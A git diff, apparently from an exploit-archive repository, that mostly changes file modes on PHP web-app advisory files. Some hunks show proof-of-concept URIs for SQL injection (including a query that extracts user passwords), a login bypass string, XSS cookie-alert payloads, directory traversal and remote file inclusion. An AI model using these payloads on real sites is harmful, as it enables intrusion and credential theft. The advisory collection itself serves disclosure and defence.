b/platforms/php/webapps/29158.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29159.txt b/platforms/php/webapps/29159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29162.txt b/platforms/php/webapps/29162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29165.txt b/platforms/php/webapps/29165.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29166.txt b/platforms/php/webapps/29166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2917.txt b/platforms/php/webapps/2917.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29173.txt b/platforms/php/webapps/29173.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29175.txt b/platforms/php/webapps/29175.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29177.txt b/platforms/php/webapps/29177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29181.txt b/platforms/php/webapps/29181.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29182.txt b/platforms/php/webapps/29182.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29183.txt b/platforms/php/webapps/29183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29184.txt b/platforms/php/webapps/29184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29185.txt b/platforms/php/webapps/29185.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29186.txt b/platforms/php/webapps/29186.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29187.txt b/platforms/php/webapps/29187.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29188.txt b/platforms/php/webapps/29188.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29198.txt b/platforms/php/webapps/29198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29199.txt b/platforms/php/webapps/29199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2920.txt b/platforms/php/webapps/2920.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29200.txt b/platforms/php/webapps/29200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29202.txt b/platforms/php/webapps/29202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29203.php b/platforms/php/webapps/29203.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29205.txt b/platforms/php/webapps/29205.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29207.txt b/platforms/php/webapps/29207.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2921.txt b/platforms/php/webapps/2921.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29211.txt b/platforms/php/webapps/29211.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29215.txt b/platforms/php/webapps/29215.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29217.txt b/platforms/php/webapps/29217.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29218.txt b/platforms/php/webapps/29218.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29222.txt b/platforms/php/webapps/29222.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29223.txt b/platforms/php/webapps/29223.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29225.txt b/platforms/php/webapps/29225.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29226.txt b/platforms/php/webapps/29226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2923.txt b/platforms/php/webapps/2923.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29232.txt b/platforms/php/webapps/29232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29233.txt b/platforms/php/webapps/29233.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29237.txt b/platforms/php/webapps/29237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29238.txt b/platforms/php/webapps/29238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2924.txt b/platforms/php/webapps/2924.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29242.txt b/platforms/php/webapps/29242.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29243.txt b/platforms/php/webapps/29243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29244.txt b/platforms/php/webapps/29244.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29245.txt b/platforms/php/webapps/29245.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29246.txt b/platforms/php/webapps/29246.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29247.txt b/platforms/php/webapps/29247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29248.txt b/platforms/php/webapps/29248.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29249.txt b/platforms/php/webapps/29249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29250.txt b/platforms/php/webapps/29250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29251.txt b/platforms/php/webapps/29251.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29252.txt b/platforms/php/webapps/29252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29253.txt b/platforms/php/webapps/29253.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29254.txt b/platforms/php/webapps/29254.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29255.txt b/platforms/php/webapps/29255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29258.txt b/platforms/php/webapps/29258.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29264.txt b/platforms/php/webapps/29264.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29265.txt b/platforms/php/webapps/29265.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29267.txt b/platforms/php/webapps/29267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29268.txt b/platforms/php/webapps/29268.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29269.txt b/platforms/php/webapps/29269.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2927.txt b/platforms/php/webapps/2927.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29270.txt b/platforms/php/webapps/29270.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29272.txt b/platforms/php/webapps/29272.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29274.html b/platforms/php/webapps/29274.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29279.txt b/platforms/php/webapps/29279.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29280.txt b/platforms/php/webapps/29280.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29282.txt b/platforms/php/webapps/29282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29283.txt b/platforms/php/webapps/29283.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29284.txt b/platforms/php/webapps/29284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29289.php b/platforms/php/webapps/29289.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29294.html b/platforms/php/webapps/29294.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29298.txt b/platforms/php/webapps/29298.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29299.txt b/platforms/php/webapps/29299.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29300.txt b/platforms/php/webapps/29300.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29303.txt b/platforms/php/webapps/29303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29304.txt b/platforms/php/webapps/29304.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29306.txt b/platforms/php/webapps/29306.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29308.txt b/platforms/php/webapps/29308.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2931.txt b/platforms/php/webapps/2931.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29311.txt b/platforms/php/webapps/29311.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29313.txt b/platforms/php/webapps/29313.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29314.txt b/platforms/php/webapps/29314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29318.txt b/platforms/php/webapps/29318.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29326.txt b/platforms/php/webapps/29326.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29328.txt b/platforms/php/webapps/29328.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29330.txt b/platforms/php/webapps/29330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29331.txt b/platforms/php/webapps/29331.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29332.txt b/platforms/php/webapps/29332.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29337.txt b/platforms/php/webapps/29337.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29338.txt b/platforms/php/webapps/29338.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29342.txt b/platforms/php/webapps/29342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29343.txt b/platforms/php/webapps/29343.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29344.txt b/platforms/php/webapps/29344.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29345.txt b/platforms/php/webapps/29345.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29346.txt b/platforms/php/webapps/29346.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29347.txt b/platforms/php/webapps/29347.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29348.txt b/platforms/php/webapps/29348.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29349.txt b/platforms/php/webapps/29349.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29350.txt b/platforms/php/webapps/29350.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29351.txt b/platforms/php/webapps/29351.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29352.txt b/platforms/php/webapps/29352.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29354.txt b/platforms/php/webapps/29354.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29356.txt b/platforms/php/webapps/29356.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29363.txt b/platforms/php/webapps/29363.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29364.txt b/platforms/php/webapps/29364.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29365.txt b/platforms/php/webapps/29365.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29366.txt b/platforms/php/webapps/29366.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29367.txt b/platforms/php/webapps/29367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29368.txt b/platforms/php/webapps/29368.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29369.txt b/platforms/php/webapps/29369.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2937.php b/platforms/php/webapps/2937.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29370.txt b/platforms/php/webapps/29370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29372.txt b/platforms/php/webapps/29372.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29375.txt b/platforms/php/webapps/29375.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29376.txt b/platforms/php/webapps/29376.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29377.txt b/platforms/php/webapps/29377.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29378.txt b/platforms/php/webapps/29378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29379.txt b/platforms/php/webapps/29379.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2938.htm b/platforms/php/webapps/2938.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29380.txt b/platforms/php/webapps/29380.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29381.txt b/platforms/php/webapps/29381.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29382.txt b/platforms/php/webapps/29382.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29384.txt b/platforms/php/webapps/29384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2939.txt b/platforms/php/webapps/2939.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29397.php b/platforms/php/webapps/29397.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2940.txt b/platforms/php/webapps/2940.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29404.txt b/platforms/php/webapps/29404.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29405.txt b/platforms/php/webapps/29405.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29407.txt b/platforms/php/webapps/29407.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29408.txt b/platforms/php/webapps/29408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29409.txt b/platforms/php/webapps/29409.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2941.txt b/platforms/php/webapps/2941.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29410.txt b/platforms/php/webapps/29410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29411.txt b/platforms/php/webapps/29411.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29412.txt b/platforms/php/webapps/29412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29413.txt b/platforms/php/webapps/29413.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29414.txt b/platforms/php/webapps/29414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29415.txt b/platforms/php/webapps/29415.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29416.txt b/platforms/php/webapps/29416.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29417.txt b/platforms/php/webapps/29417.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29418.txt b/platforms/php/webapps/29418.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29419.txt b/platforms/php/webapps/29419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29420.txt b/platforms/php/webapps/29420.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29421.txt b/platforms/php/webapps/29421.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29422.txt b/platforms/php/webapps/29422.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29423.txt b/platforms/php/webapps/29423.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29424.txt b/platforms/php/webapps/29424.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29425.txt b/platforms/php/webapps/29425.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29426.txt b/platforms/php/webapps/29426.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29427.txt b/platforms/php/webapps/29427.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29428.txt b/platforms/php/webapps/29428.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29429.txt b/platforms/php/webapps/29429.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2943.txt b/platforms/php/webapps/2943.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29430.txt b/platforms/php/webapps/29430.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29431.txt b/platforms/php/webapps/29431.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29432.txt b/platforms/php/webapps/29432.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29433.txt b/platforms/php/webapps/29433.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29434.txt b/platforms/php/webapps/29434.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29437.txt b/platforms/php/webapps/29437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29438.txt b/platforms/php/webapps/29438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2944.txt b/platforms/php/webapps/2944.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29442.html b/platforms/php/webapps/29442.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2945.txt b/platforms/php/webapps/2945.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29450.txt b/platforms/php/webapps/29450.txt old mode 100755 new mode 100644 index b71ac1073..ba9f8e5d8 --- a/platforms/php/webapps/29450.txt +++ b/platforms/php/webapps/29450.txt @@ -26,4 +26,4 @@ An attacker can exploit this issue via a web client. The following proof-of-concept URIs are available: http://www.example.com/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=notnumber -http://www.example.com/ezboxx/boxx/knowledgebase.asp?iid=1&Cat=notnumber \ No newline at end of file +http://www.example.com/ezboxx/boxx/knowledgebase.asp?iid=1&Cat=notnumber \ No newline at end of file diff --git a/platforms/php/webapps/29451.txt b/platforms/php/webapps/29451.txt old mode 100755 new mode 100644 index 2d6c1f219..e6a5dd920 --- a/platforms/php/webapps/29451.txt +++ b/platforms/php/webapps/29451.txt @@ -8,8 +8,4 @@ All In One Control Panel 1.3.009 and prior versions are vulnerable. http://www.example.com/AIOCP/public/code/cp_downloads.php?did=[sql] -http://www.example.org/AIOCP/public/code/cp_downloads.php?did='+UNION+SELECT+NULL,NULL,NULL,NULL,user_id,NULL,NULL,user_name,NULL,user_password,NULL,NULL,NULL,NULL,NULL+FROM+aiocp_users+WHERE+user_name<>'Anonymous - - - - \ No newline at end of file +http://www.example.org/AIOCP/public/code/cp_downloads.php?did='+UNION+SELECT+NULL,NULL,NULL,NULL,user_id,NULL,NULL,user_name,NULL,user_password,NULL,NULL,NULL,NULL,NULL+FROM+aiocp_users+WHERE+user_name<>'Anonymous \ No newline at end of file diff --git a/platforms/php/webapps/29453.php b/platforms/php/webapps/29453.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29464.txt b/platforms/php/webapps/29464.txt old mode 100755 new mode 100644 index 28503e7f9..f83087009 --- a/platforms/php/webapps/29464.txt +++ b/platforms/php/webapps/29464.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to gain unauthorized access to the administra Version 2.1 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/liens_dynamiques/admin/adminlien.php3 \ No newline at end of file +http://www.example.com/liens_dynamiques/admin/adminlien.php3 \ No newline at end of file diff --git a/platforms/php/webapps/29466.txt b/platforms/php/webapps/29466.txt old mode 100755 new mode 100644 index f24de9b46..d202e447c --- a/platforms/php/webapps/29466.txt +++ b/platforms/php/webapps/29466.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to steal cookie-based authentication creden These issues affect version 2.1; other versions may also be affected. -http://www.example.com/liens.php3?ajouter=1 \ No newline at end of file +http://www.example.com/liens.php3?ajouter=1 \ No newline at end of file diff --git a/platforms/php/webapps/29468.txt b/platforms/php/webapps/29468.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29469.txt b/platforms/php/webapps/29469.txt old mode 100755 new mode 100644 index 86c8f61fe..2d8cb4468 --- a/platforms/php/webapps/29469.txt +++ b/platforms/php/webapps/29469.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities using directory-traversal strings These issues affect version 1.0.3.06; other versions may also be vulnerable. -http://www.example.com/smileys.php?language=../../example_file.xxx%00? \ No newline at end of file +http://www.example.com/smileys.php?language=../../example_file.xxx%00? \ No newline at end of file diff --git a/platforms/php/webapps/29472.txt b/platforms/php/webapps/29472.txt old mode 100755 new mode 100644 index 7760cd60f..230455e9a --- a/platforms/php/webapps/29472.txt +++ b/platforms/php/webapps/29472.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code execute in the Version 1.0f is vulnerable; other versions may also be affected. -http://www.example.com/[dt_guestbook_v1-directory]/index.php?submit=1&error[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/[dt_guestbook_v1-directory]/index.php?submit=1&error[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/29474.txt b/platforms/php/webapps/29474.txt old mode 100755 new mode 100644 index 54a173888..bdf2685b0 --- a/platforms/php/webapps/29474.txt +++ b/platforms/php/webapps/29474.txt @@ -9,4 +9,4 @@ This issue affects version 1.21; other versions may also be vulnerable. The following input to the login form is sufficient to exploit this issue: Login: admin -Password: anything' OR 'x'='x \ No newline at end of file +Password: anything' OR 'x'='x \ No newline at end of file diff --git a/platforms/php/webapps/29476.txt b/platforms/php/webapps/29476.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29477.txt b/platforms/php/webapps/29477.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29478.txt b/platforms/php/webapps/29478.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29479.txt b/platforms/php/webapps/29479.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2948.txt b/platforms/php/webapps/2948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29480.txt b/platforms/php/webapps/29480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29481.txt b/platforms/php/webapps/29481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29482.php b/platforms/php/webapps/29482.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29483.txt b/platforms/php/webapps/29483.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29484.txt b/platforms/php/webapps/29484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29485.txt b/platforms/php/webapps/29485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29486.txt b/platforms/php/webapps/29486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29487.txt b/platforms/php/webapps/29487.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29488.txt b/platforms/php/webapps/29488.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29489.txt b/platforms/php/webapps/29489.txt old mode 100755 new mode 100644 index ad3e59aca..5428d015f --- a/platforms/php/webapps/29489.txt +++ b/platforms/php/webapps/29489.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t Indexu 5.3.0 and prior versions are vulnerable; other versions may also be affected. -http://www.example.com/INDEXU_PATH/login.php?error_msg=[XSS] \ No newline at end of file +http://www.example.com/INDEXU_PATH/login.php?error_msg=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/29491.txt b/platforms/php/webapps/29491.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29492.txt b/platforms/php/webapps/29492.txt old mode 100755 new mode 100644 index 06c0f25eb..6e06c6203 --- a/platforms/php/webapps/29492.txt +++ b/platforms/php/webapps/29492.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t These issues affect version 2.1.5; other versions may also be affected. -http://www.example.com/login.php/>">[xss] \ No newline at end of file +http://www.example.com/login.php/>">[xss] \ No newline at end of file diff --git a/platforms/php/webapps/29497.txt b/platforms/php/webapps/29497.txt old mode 100755 new mode 100644 index c30305650..67b325fbc --- a/platforms/php/webapps/29497.txt +++ b/platforms/php/webapps/29497.txt @@ -8,4 +8,4 @@ An example URI has been provided: http://www.example.com/psm/admin/memberlist.php?keyword=[SQl]&p=a&by=1&sbmt1=++Search++&init_row=0&sort=create_time&sq=desc&status=1 -http://www.example.com/psm/admin/edit_member.php?username=Admin=[XSS] \ No newline at end of file +http://www.example.com/psm/admin/edit_member.php?username=Admin=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/29498.txt b/platforms/php/webapps/29498.txt old mode 100755 new mode 100644 index c0aef165a..6b243b3e6 --- a/platforms/php/webapps/29498.txt +++ b/platforms/php/webapps/29498.txt @@ -18,4 +18,4 @@ An attacker can exploit this issue via a web client. An example URI has been provided: -http://www.example.com/path/admin/memberlist.php?init_row=[SQL] \ No newline at end of file +http://www.example.com/path/admin/memberlist.php?init_row=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/29499.txt b/platforms/php/webapps/29499.txt old mode 100755 new mode 100644 index 03240e066..ca7d2534f --- a/platforms/php/webapps/29499.txt +++ b/platforms/php/webapps/29499.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would execute in the context of the affec NOTE: To trigger this vulnerability, the attacker must log in with a valid account. -http://www.example.com/smf/index.php?action=pm;sa=send \ No newline at end of file +http://www.example.com/smf/index.php?action=pm;sa=send \ No newline at end of file diff --git a/platforms/php/webapps/29504.txt b/platforms/php/webapps/29504.txt old mode 100755 new mode 100644 index f8048e1bc..2bbd87878 --- a/platforms/php/webapps/29504.txt +++ b/platforms/php/webapps/29504.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce This issue affects version 1; other versions may also be vulnerable. -http://example.com/uds/banner.php?bid=[SQL] \ No newline at end of file +http://example.com/uds/banner.php?bid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/29505.txt b/platforms/php/webapps/29505.txt old mode 100755 new mode 100644 index 8f5fb6614..d4137c18b --- a/platforms/php/webapps/29505.txt +++ b/platforms/php/webapps/29505.txt @@ -8,4 +8,4 @@ These issues affect versions 0.08 Beta and 6.30 Beta; other versions may also be http://www.example.com/board/search.php?keyword=[XSS] -http://www.example.com/Board/list3.php?user=[XSS] \ No newline at end of file +http://www.example.com/Board/list3.php?user=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/29506.txt b/platforms/php/webapps/29506.txt old mode 100755 new mode 100644 index 6f14ff7e0..64f9e9896 --- a/platforms/php/webapps/29506.txt +++ b/platforms/php/webapps/29506.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t These issues affect version 1.3.1; other versions may also be vulnerable. -http://www.example.com/articles/edit.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt> http://www.example.com/articles/list.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt> http://www.example.com/blogs/list_blogs.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt> http://www.example.com/blogs/rankings.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt> \ No newline at end of file +http://www.example.com/articles/edit.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt> http://www.example.com/articles/list.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt> http://www.example.com/blogs/list_blogs.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt> http://www.example.com/blogs/rankings.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/29507.txt b/platforms/php/webapps/29507.txt old mode 100755 new mode 100644 index 9cf47c33c..f263800a8 --- a/platforms/php/webapps/29507.txt +++ b/platforms/php/webapps/29507.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code execute in the Version 4.00 beta is vulnerable; other versions may also be affected. -http://www.example.com/guestbookv4.0/show.php?user='><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/guestbookv4.0/show.php?user='><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/29512.txt b/platforms/php/webapps/29512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29514.txt b/platforms/php/webapps/29514.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29517.txt b/platforms/php/webapps/29517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29519.txt b/platforms/php/webapps/29519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29521.txt b/platforms/php/webapps/29521.txt old mode 100755 new mode 100644 index 29fb0727b..a9dbf80b3 --- a/platforms/php/webapps/29521.txt +++ b/platforms/php/webapps/29521.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects version 0.1; other versions may also be vulnerable. -http://www.example.com/modules/mail/main.php?MODULES_DIR=shell.txt \ No newline at end of file +http://www.example.com/modules/mail/main.php?MODULES_DIR=shell.txt \ No newline at end of file diff --git a/platforms/php/webapps/29525.txt b/platforms/php/webapps/29525.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29529.txt b/platforms/php/webapps/29529.txt old mode 100755 new mode 100644 index 860d14cb1..b57d04333 --- a/platforms/php/webapps/29529.txt +++ b/platforms/php/webapps/29529.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code execute in the This issue affects version 1.5; other versions may also be affected. -http://www.example.com/path/php_mm1.4/admin.php?_p=XSS=_approval_users \ No newline at end of file +http://www.example.com/path/php_mm1.4/admin.php?_p=XSS=_approval_users \ No newline at end of file diff --git a/platforms/php/webapps/2953.php b/platforms/php/webapps/2953.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29530.txt b/platforms/php/webapps/29530.txt old mode 100755 new mode 100644 index e8c9ce015..939e51fa3 --- a/platforms/php/webapps/29530.txt +++ b/platforms/php/webapps/29530.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to retrieve arbitrary files from the FD Script 1.32 and prior versions are vulnerable to this issue. -http://www,example.com/download.php?fname=[SOURCE FILE] \ No newline at end of file +http://www,example.com/download.php?fname=[SOURCE FILE] \ No newline at end of file diff --git a/platforms/php/webapps/29534.txt b/platforms/php/webapps/29534.txt old mode 100755 new mode 100644 index 